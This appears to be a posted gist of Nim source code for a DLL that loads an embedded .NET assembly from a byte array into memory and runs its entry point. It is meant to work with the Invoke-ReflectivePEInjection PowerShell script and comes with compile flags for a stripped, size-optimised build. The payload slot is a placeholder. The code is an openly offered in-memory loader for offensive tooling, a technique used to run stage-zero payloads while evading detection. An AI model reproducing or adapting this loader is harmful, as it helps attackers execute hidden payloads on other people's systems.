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Last active February 4, 2022 16:13
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testnim for Invoke-ReflectivePEInjection
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: BSD 3-Clause
I still can't believe this was added directly in the Winim library. Huge props to the author of Winim for this (khchen), really great stuff.
Make sure you have Winim >=3.6.0 installed. If in doubt do a `nimble install winim`
Also see for an amazing pro-tip from the author of Winim in order to determine the marshalling type of .NET objects.
Compile: nim c -d=mingw -d:danger -d:strip --opt:size --app=lib --nomain --cpu=amd64 --passL:-Wl,--dynamicbase .\execute_assembly_bin.nim
Modified to be compatible with BC-Security's Invoke-ReflectivePEInjection.ps1 script
import winim/clr
import winim/lean
import sugar
import strformat
# Stage Zero .Net assembly w/ DInvoke - Created with CSharptoNimByteArray by @s3cur3th1ssh1t
# Put your buf Nim byte array here
# It should be like ` var buf: array[31337, byte] = [byte 0x4D, etc, etc, .....] `
proc NimMain() {.cdecl, importc.}
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
return true
# This exported function is going to be triggered. Name VoidFunc came from Invoke-ReflectivePEInjection's README.
proc VoidFunc() : void {.stdcall,exportc,dynlib.} =
# Always have this at exported functions that's being used - or the process explodes! (according to byt3bl33d3r)
for v in clrVersions():
echo fmt" \--- {v}"
echo "\n"
var assembly = load(buf)
dump assembly
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
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